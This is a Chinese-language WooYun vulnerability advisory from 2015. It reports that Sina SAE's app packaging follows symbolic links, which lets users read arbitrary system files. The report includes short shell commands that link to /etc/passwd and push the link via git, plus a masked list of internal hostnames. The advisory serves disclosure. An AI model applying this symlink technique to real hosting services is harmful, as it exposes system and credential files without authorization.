当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131911

漏洞标题:绕过新浪SAE沙盒读取系统任意文件

相关厂商:新浪

漏洞作者: phith0n

提交时间:2015-08-05 18:20

修复时间:2015-09-20 11:44

公开时间:2015-09-20 11:44

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

测试另一个洞,没注意被送了一个。。。定期打卡

详细说明:

类似这个洞,也是链接文件造成的沙盒绕过:
WooYun: 绕过新浪SAE沙盒读取系统任意文件
sae在应用打包下载的时候,会将链接文件所指向文件一起打包起来,导致绕过沙盒读取任意文件。
首先在git提交代码的时候,建立链接文件:

ln -s /etc/passwd passwd
git add .
git commit -m "123"
git push


应用页面有一处下载:

QQ20150805-1@2x.png


下载后解压缩,目标文件就躺在那里了:

QQ20150805-2@2x.png


包括hosts文件,比较敏感我就打码了。只要有权限即可下载,沙盒什么的都无视掉:

mask 区域
*****.localdoma*****
*****0.svndepl*****
**********
*****master.*****
*****alert.sae*****
*****image.sae*****
*****igger.sae*****
*****igger.sae*****
*****orm.sae.s*****
*****eploy.sae*****
***** mail.sae*****
*****queue.sae*****
*****askqueue.sae*****
***** rank.sae*****
*****djob.sae.s*****
***** stor.sae*****
***** log.sae*****
*****pvuip.sae*****
*****inter.sae*****
***** s3.sae*****
*****otice.sae*****
***** ms.sae*****
*****vcode.sae*****
***** diag.sae*****
***** api.sae*****
*****eploy.sae*****
*****i.svn.sae*****
*****t.sws.sae*****
*****r.sws.sae*****
*****ect.tools.*****
*****annel.sae*****
**********
*****nitor.sae.*****
***** admin.sae*****
*****aemc.sae.s*****
**********
*****churl.sae*****
*****gment.sae*****
***** push.sae*****
*****aepush.sae*****
***** fts.sae*****
**********
*****h.sws.sae*****
*****h.sws.sae*****
*****.sws.sae.s*****
*****.sws.sae.s*****
*****.sws.sae.s*****
*****n.sws.sae.*****
**********
*****odefs.sae*****
*****odefs.sae.*****
**********
***** mcx.sae*****
*****.mail.sae*****
**********
*****m3307.sae*****
*****sql.sae.s*****
*****pmysql.sae*****
*****c.sae.sin*****
*****query.sae.*****
*****fetch.sae.*****
*****se.sae.si*****
*****oop.sae.s*****
*****amcx.sae.*****
**********
*****ysql.sae.s*****
*****mysql.sae.*****
*****mysql.sae.*****
*****6.sae.sin*****
*****6.sae.sin*****
*****i.sinacl*****
**********
**********
**********
**********
*****ger.sina*****
*****ck.sae.s*****
*****pi.sae.s*****
**********
**********
*****internal.sa*****

漏洞证明:

见上面。

修复方案:

禁止打包链接文件。

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-06 11:43

厂商回复:

感谢提醒,已经通知业务整改

最新状态:

暂无